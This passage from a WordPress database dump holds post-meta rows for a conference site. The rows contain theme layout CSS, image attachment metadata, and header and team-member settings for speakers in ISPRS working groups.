.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(22120,3427,'_edit_lock','1675608519:1'),
(22121,3428,'_wp_attached_file','2022/12/w24m.jpg'),
(22122,3428,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:501;s:6:\"height\";i:304;s:4:\"file\";s:16:\"2022/12/w24m.jpg\";s:8:\"filesize\";i:89709;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w24m-300x182.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9691;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w24m-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5290;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(22123,3427,'_thumbnail_id','3428'),
(22124,3427,'_edit_last','1'),
(22125,3427,'_wpb_vc_js_status','true'),
(22126,3427,'_dt_sidebar_position','disabled'),
(22127,3427,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22128,3427,'_dt_sidebar_hide_on_mobile','0'),
(22129,3427,'_dt_footer_show','1'),
(22130,3427,'_dt_footer_widgetarea_id','sidebar_2'),
(22131,3427,'_dt_footer_hide_on_mobile','0'),
(22132,3427,'_dt_header_title','fancy'),
(22133,3427,'_dt_header_background','normal'),
(22134,3427,'_dt_header_background_below_slideshow','disabled'),
(22135,3427,'_dt_header_transparent_bg_color_scheme','light'),
(22136,3427,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22137,3427,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22138,3427,'_dt_header_transparent_bg_color','#000000'),
(22139,3427,'_dt_header_transparent_bg_opacity','50'),
(22140,3427,'_dt_header_disabled_background','normal'),
(22141,3427,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(22142,3427,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(22143,3427,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(22144,3427,'_dt_header_disabled_transparent_bg_color','#000000'),
(22145,3427,'_dt_header_disabled_transparent_bg_opacity','50'),
(22146,3427,'_dt_page_overrides_top_margin',''),
(22147,3427,'_dt_page_overrides_right_margin',''),
(22148,3427,'_dt_page_overrides_bottom_margin',''),
(22149,3427,'_dt_page_overrides_left_margin',''),
(22150,3427,'_dt_mobile_page_padding_top',''),
(22151,3427,'_dt_mobile_page_padding_right',''),
(22152,3427,'_dt_mobile_page_padding_bottom',''),
(22153,3427,'_dt_mobile_page_padding_left',''),
(22154,3427,'_dt_fancy_header_layout_heading',''),
(22155,3427,'_dt_fancy_header_title_aligment','center'),
(22156,3427,'_dt_fancy_header_height','300'),
(22157,3427,'_dt_fancy_header_padding-top','0px'),
(22158,3427,'_dt_fancy_header_padding-bottom','0px'),
(22159,3427,'_dt_fancy_header_breadcrumbs_heading',''),
(22160,3427,'_dt_fancy_header_breadcrumbs','disabled'),
(22161,3427,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(22162,3427,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(22163,3427,'_dt_fancy_header_title_heading',''),
(22164,3427,'_dt_fancy_header_title_mode','custom'),
(22165,3427,'_dt_fancy_header_title',''),
(22166,3427,'_dt_fancy_header_title_font_size','30'),
(22167,3427,'_dt_fancy_header_title_line_height','36'),
(22168,3427,'_dt_fancy_header_text_transform','none'),
(22169,3427,'_dt_fancy_header_title_color_mode','color'),
(22170,3427,'_dt_fancy_header_title_color','#000000'),
(22171,3427,'_dt_fancy_header_subtitle_heading',''),
(22172,3427,'_dt_fancy_header_subtitle',''),
(22173,3427,'_dt_fancy_header_subtitle_font_size','18'),
(22174,3427,'_dt_fancy_header_subtitle_line_height','26'),
(22175,3427,'_dt_fancy_header_subtitle_text_transform','none'),
(22176,3427,'_dt_fancy_header_subtitle_color_mode','color'),
(22177,3427,'_dt_fancy_header_subtitle_color','#ffffff'),
(22178,3427,'_dt_fancy_header_bg_heading',''),
(22179,3427,'_dt_fancy_header_bg_color','#222222'),
(22180,3427,'_dt_fancy_header_bg_image_origin','featured_image'),
(22181,3427,'_dt_fancy_header_bg_image','a:0:{}'),
(22182,3427,'_dt_fancy_header_bg_repeat','no-repeat'),
(22183,3427,'_dt_fancy_header_bg_position_x','center'),
(22184,3427,'_dt_fancy_header_bg_position_y','center'),
(22185,3427,'_dt_fancy_header_bg_fullscreen','1'),
(22186,3427,'_dt_fancy_header_bg_overlay','0'),
(22187,3427,'_dt_fancy_header_overlay_color','#000'),
(22188,3427,'_dt_fancy_header_bg_overlay_opacity','50'),
(22189,3427,'_dt_fancy_header_scroll_effect','default'),
(22190,3427,'_dt_fancy_header_bg_parallax','0.5'),
(22191,3427,'_dt_fancy_header_responsiveness_heading',''),
(22192,3427,'_dt_fancy_header_responsiveness','disabled'),
(22193,3427,'_dt_fancy_header_responsiveness_switch','778px'),
(22194,3427,'_dt_fancy_header_responsive_height','70'),
(22195,3427,'_dt_fancy_header_responsive_font_size','30'),
(22196,3427,'_dt_fancy_header_responsive_title_line_height','38'),
(22197,3427,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(22198,3427,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(22199,3427,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(22200,3427,'_dt_project_options_back_button',''),
(22201,3427,'_dt_project_options_show_link',''),
(22202,3427,'_dt_project_options_link',''),
(22203,3427,'_dt_project_options_link_target',''),
(22204,3427,'_dt_project_options_link_name',''),
(22205,3427,'_dt_project_options_hide_thumbnail','1'),
(22206,3427,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(22207,3427,'_dt_project_options_related_mode','same'),
(22208,3427,'_dt_project_options_preview','normal'),
(22209,3427,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/12/w24m.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #000000;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(22210,3431,'_edit_lock','1670385861:1'),
(22211,3432,'_wp_attached_file','2022/12/w241.jpg'),
(22212,3432,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:158;s:6:\"height\";i:192;s:4:\"file\";s:16:\"2022/12/w241.jpg\";s:8:\"filesize\";i:48042;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w241-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6169;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(22213,3431,'_thumbnail_id','3432'),
(22214,3431,'_edit_last','1'),
(22215,3431,'_dt_sidebar_position','disabled'),
(22216,3431,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22217,3431,'_dt_sidebar_hide_on_mobile','0'),
(22218,3431,'_dt_footer_show','1'),
(22219,3431,'_dt_footer_widgetarea_id','sidebar_2'),
(22220,3431,'_dt_footer_hide_on_mobile','0'),
(22221,3431,'_dt_header_title','fancy'),
(22222,3431,'_dt_header_background','normal'),
(22223,3431,'_dt_header_background_below_slideshow','disabled'),
(22224,3431,'_dt_header_transparent_bg_color_scheme','light'),
(22225,3431,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22226,3431,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22227,3431,'_dt_header_transparent_bg_color','#000000'),
(22228,3431,'_dt_header_transparent_bg_opacity','50'),
(22229,3431,'_dt_header_disabled_background','normal'),
(22230,3431,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(22231,3431,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(22232,3431,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(22233,3431,'_dt_header_disabled_transparent_bg_color','#000000'),
(22234,3431,'_dt_header_disabled_transparent_bg_opacity','50'),
(22235,3431,'_dt_page_overrides_top_margin',''),
(22236,3431,'_dt_page_overrides_right_margin',''),
(22237,3431,'_dt_page_overrides_bottom_margin',''),
(22238,3431,'_dt_page_overrides_left_margin',''),
(22239,3431,'_dt_mobile_page_padding_top',''),
(22240,3431,'_dt_mobile_page_padding_right',''),
(22241,3431,'_dt_mobile_page_padding_bottom',''),
(22242,3431,'_dt_mobile_page_padding_left',''),
(22243,3431,'_dt_fancy_header_layout_heading',''),
(22244,3431,'_dt_fancy_header_title_aligment','center'),
(22245,3431,'_dt_fancy_header_height','300'),
(22246,3431,'_dt_fancy_header_padding-top','0px'),
(22247,3431,'_dt_fancy_header_padding-bottom','0px'),
(22248,3431,'_dt_fancy_header_breadcrumbs_heading',''),
(22249,3431,'_dt_fancy_header_breadcrumbs','enabled'),
(22250,3431,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(22251,3431,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(22252,3431,'_dt_fancy_header_title_heading',''),
(22253,3431,'_dt_fancy_header_title_mode','custom'),
(22254,3431,'_dt_fancy_header_title','Prof Muralikrishna Iyyanki'),
(22255,3431,'_dt_fancy_header_title_font_size','30'),
(22256,3431,'_dt_fancy_header_title_line_height','36'),
(22257,3431,'_dt_fancy_header_text_transform','none'),
(22258,3431,'_dt_fancy_header_title_color_mode','color'),
(22259,3431,'_dt_fancy_header_title_color','#ffffff'),
(22260,3431,'_dt_fancy_header_subtitle_heading',''),
(22261,3431,'_dt_fancy_header_subtitle','ISPRS WG III/9 on Geospatial Environment and Health '),
(22262,3431,'_dt_fancy_header_subtitle_font_size','18'),
(22263,3431,'_dt_fancy_header_subtitle_line_height','26'),
(22264,3431,'_dt_fancy_header_subtitle_text_transform','none'),
(22265,3431,'_dt_fancy_header_subtitle_color_mode','color'),
(22266,3431,'_dt_fancy_header_subtitle_color','#ffffff'),
(22267,3431,'_dt_fancy_header_bg_heading',''),
(22268,3431,'_dt_fancy_header_bg_color','#222222'),
(22269,3431,'_dt_fancy_header_bg_image_origin','custom'),
(22270,3431,'_dt_fancy_header_bg_image','a:0:{}'),
(22271,3431,'_dt_fancy_header_bg_repeat','no-repeat'),
(22272,3431,'_dt_fancy_header_bg_position_x','center'),
(22273,3431,'_dt_fancy_header_bg_position_y','center'),
(22274,3431,'_dt_fancy_header_bg_fullscreen','1'),
(22275,3431,'_dt_fancy_header_bg_overlay','0'),
(22276,3431,'_dt_fancy_header_overlay_color','#000'),
(22277,3431,'_dt_fancy_header_bg_overlay_opacity','50'),
(22278,3431,'_dt_fancy_header_scroll_effect','default'),
(22279,3431,'_dt_fancy_header_bg_parallax','0.5'),
(22280,3431,'_dt_fancy_header_responsiveness_heading',''),
(22281,3431,'_dt_fancy_header_responsiveness','disabled'),
(22282,3431,'_dt_fancy_header_responsiveness_switch','778px'),
(22283,3431,'_dt_fancy_header_responsive_height','70'),
(22284,3431,'_dt_fancy_header_responsive_font_size','30'),
(22285,3431,'_dt_fancy_header_responsive_title_line_height','38'),
(22286,3431,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(22287,3431,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(22288,3431,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(22289,3431,'_dt_teammate_options_go_to_single','1'),
(22290,3431,'_dt_teammate_options_position',''),
(22291,3431,'_dt_teammate_options_website',''),
(22292,3431,'_dt_teammate_options_mail',''),
(22293,3431,'_dt_teammate_options_facebook',''),
(22294,3431,'_dt_teammate_options_twitter',''),
(22295,3431,'_dt_teammate_options_dribbble',''),
(22296,3431,'_dt_teammate_options_you-tube',''),
(22297,3431,'_dt_teammate_options_rss',''),
(22298,3431,'_dt_teammate_options_delicious',''),
(22299,3431,'_dt_teammate_options_flickr',''),
(22300,3431,'_dt_teammate_options_lastfm',''),
(22301,3431,'_dt_teammate_options_linkedin',''),
(22302,3431,'_dt_teammate_options_vimeo',''),
(22303,3431,'_dt_teammate_options_tumbler',''),
(22304,3431,'_dt_teammate_options_pinterest',''),
(22305,3431,'_dt_teammate_options_devian',''),
(22306,3431,'_dt_teammate_options_skype',''),
(22307,3431,'_dt_teammate_options_github',''),
(22308,3431,'_dt_teammate_options_instagram',''),
(22309,3431,'_dt_teammate_options_stumbleupon',''),
(22310,3431,'_dt_teammate_options_behance',''),
(22311,3431,'_dt_teammate_options_px-500',''),
(22312,3431,'_dt_teammate_options_tripedvisor',''),
(22313,3431,'_dt_teammate_options_vk',''),
(22314,3431,'_dt_teammate_options_foursquare',''),
(22315,3431,'_dt_teammate_options_xing',''),
(22316,3431,'_dt_teammate_options_weibo',''),
(22317,3431,'_dt_teammate_options_odnoklassniki',''),
(22318,3431,'_dt_teammate_options_research-gate',''),
(22319,3431,'_dt_teammate_options_yelp',''),
(22320,3431,'_dt_teammate_options_blogger',''),
(22321,3431,'_dt_teammate_options_soundcloud',''),
(22322,3431,'_dt_teammate_options_viber',''),
(22323,3431,'_dt_teammate_options_whatsapp',''),
(22324,3431,'_dt_teammate_options_reddit',''),
(22325,3431,'_dt_teammate_options_snapchat',''),
(22326,3431,'_dt_teammate_options_telegram',''),
(22327,3431,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(22328,3433,'_edit_lock','1673661447:1'),
(22329,3433,'_edit_last','1'),
(22330,3433,'_dt_sidebar_position','disabled'),
(22331,3433,'_dt_sidebar_widgetarea_id','sidebar_1'),
(22332,3433,'_dt_sidebar_hide_on_mobile','0'),
(22333,3433,'_dt_footer_show','1'),
(22334,3433,'_dt_footer_widgetarea_id','sidebar_2'),
(22335,3433,'_dt_footer_hide_on_mobile','0'),
(22336,3433,'_dt_header_title','fancy'),
(22337,3433,'_dt_header_background','normal'),
(22338,3433,'_dt_header_background_below_slideshow','disabled'),
(22339,3433,'_dt_header_transparent_bg_color_scheme','light'),
(22340,3433,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(22341,3433,'_dt_header_transparent_top_bar_bg_opacity','25'),
(22342,3433,'_dt_header_transparent_bg_color','#000000'),
(22343,3433,'_dt_header_transparent_bg_opacity','50'),
(22344,3433,'_dt_header_disabled_background','normal'),
(22345,3433,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(22346,3433,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(22347,3433,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(22348,3433,'_dt_header_disabled_transparent_bg_color','#000000'),
(22349,3433,'_dt_header_disabled_transparent_bg_opacity','50'),
(22350,3433,'_dt_page_overrides_top_margin',''),
(22351,3433,'_dt_page_overrides_right_margin',''),
(22352,3433,'_dt_page_overrides_bottom_margin',''),
(22353,3433,'_dt_page_overrides_left_margin',''),
(22354,3433,'_dt_mobile_page_padding_top',''),
(22355,3433,'_dt_mobile_page_padding_right',''),
(22356,3433,'_dt_mobile_page_padding_bottom',''),
(22357,3433,'_dt_mobile_page_padding_left',''),
(22358,3433,'_dt_fancy_header_layout_heading',''),
(22359,3433,'_dt_fancy_header_title_aligment','center'),
(22360,3433,'_dt_fancy_header_height','300'),
(22361,3433,'_dt_fancy_header_padding-top','0px'),
(22362,3433,'_dt_fancy_header_padding-bottom','0px'),
(22363,3433,'_dt_fancy_header_breadcrumbs_heading',''),
(22364,3433,'_dt_fancy_header_breadcrumbs','disabled'),
(22365,3433,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(22366,3433,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(22367,3433,'_dt_fancy_header_title_heading',''),
(22368,3433,'_dt_fancy_header_title_mode','custom'),
(22369,3434,'_edit_lock','1670386903:1'),
(22370,3433,'_dt_fancy_header_title','Dr Juan Ceusta'),
(22371,3433,'_dt_fancy_header_title_font_size','30'),
(22372,3433,'_dt_fancy_header_title_line_height','36'),
(22373,3433,'_dt_fancy_header_text_transform','none'),
(22374,3433,'_dt_fancy_header_title_color_mode','color'),
(22375,3433,'_dt_fancy_header_title_color','#ffffff'),
(22376,3433,'_dt_fancy_header_subtitle_heading',''),
(22377,3433,'_dt_fancy_header_subtitle','ISPRS WG III/6 on Remote Sensing of Atmosphere'),
(22378,3433,'_dt_fancy_header_subtitle_font_size','18'),
(22379,3433,'_dt_fancy_header_subtitle_line_height','26'),
(22380,3433,'_dt_fancy_header_subtitle_text_transform','none'),
(22381,3433,'_dt_fancy_header_subtitle_color_mode','color'),
(22382,3433,'_dt_fancy_header_subtitle_color','#ffffff'),
(22383,3433,'_dt_fancy_header_bg_heading',''),
(22384,3433,'_dt_fancy_header_bg_color','#222222'),
(22385,3433,'_dt_fancy_header_bg_image_origin','custom'),
(22386,3433,'_dt_fancy_header_bg_image','a:0:{}'),
(22387,3433,'_dt_fancy_header_bg_repeat','no-repeat'),
(22388,3433,'_dt_fancy_header_bg_position_x','center'),
(22389,3433,'_dt_fancy_header_bg_position_y','center'),
(22390,3433,'_dt_fancy_header_bg_fullscreen','1'),
(22391,3433,'_dt_fancy_header_bg_overlay','0'),
(22392,3433,'_dt_fancy_header_overlay_color','#000'),
(22393,3433,'_dt_fancy_header_bg_overlay_opacity','50'),
(22394,3433,'_dt_fancy_header_scroll_effect','default'),
(22395,3433,'_dt_fancy_header_bg_parallax','0.5'),
(22396,3433,'_dt_fancy_header_responsiveness_heading',''),
(22397,3433,'_dt_fancy_header_responsiveness','disabled'),
(22398,3433,'_dt_fancy_header_responsiveness_switch','778px'),
(22399,3433,'_dt_fancy_header_responsive_height','70'),
(22400,3433,'_dt_fancy_header_responsive_font_size','30'),
(22401,3433,'_dt_fancy_header_responsive_title_line_height','38'),
(22402,3433,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(22403,3433,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(22404,3433,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(22405,3433,'_dt_teammate_options_go_to_single','1'),
(22406,3433,'_dt_teammate_options_position',''),
(22407,3433,'_dt_teammate_options_website',''),
(22408,3433,'_dt_teammate_options_mail',''),
(22409,3433,'_dt_teammate_options_facebook',''),
(22410,3433,'_dt_teammate_options_twitter',''),
(22411,3433,'_dt_teammate_options_dribbble',''),
(22412,3433,'_dt_teammate_options_you-tube',''),
(22413,3433,'_dt_teammate_options_rss',''),
(22414,3433,'_dt_teammate_options_delicious',''),
(22415,3433,'_dt_teammate_options_flickr',''),
(22416,3433,'_dt_teammate_options_lastfm',''),
(22417,3433,'_dt_teammate_options_linkedin',''),
(22418,3433,'_dt_teammate_options_vimeo',''),
(22419,3433,'_dt_teammate_options_tumbler',''),
(22420,3433,'_dt_teammate_options_pinterest',''),
(22421,3433,'_dt_teammate_options_devian',''),
(22422,3433,'_dt_teammate_options_skype',''),
(22423,3433,'_dt_teammate_options_github',''),
(22424,3433,'_dt_teammate_options_instagram',''),
(22425,3433,'_dt_teammate_options_stumbleupon',''),
(22426,3433,'_dt_teammate_options_behance',''),
(22427,3433,'_dt_teammate_options_px-500',''),
(22428,3433,'_dt_teammate_options_tripedvisor',''),
(22429,3433,'_dt_teammate_options_vk',''),
(22430,3433,'_dt_teammate_options_foursquare',''),
(22431,3433,'_dt_teammate_options_xing',''),
(22432,3433,'_dt_teammate_options_weibo',''),
(22433,3433,'_dt_teammate_options_odnoklassniki',''),
(22434,3433,'_dt_teammate_options_research-gate',''),
(22435,3433,'_dt_teammate_options_yelp',''),
(22436,3433,'_dt_teammate_options_blogger',''),
(22437,3433,'_dt_teammate_options_soundcloud',''),
(22438,3433,'_dt_teammate_options_viber',''),
(22439,3433,'_dt_teammate_options_whatsapp',''),
(22440,3433,'_dt_teammate_options_reddit',''),
(22441,3433,'_dt_teammate_options_snapchat',''),
(22442,3433,'_dt_teammate_options_telegram',''),
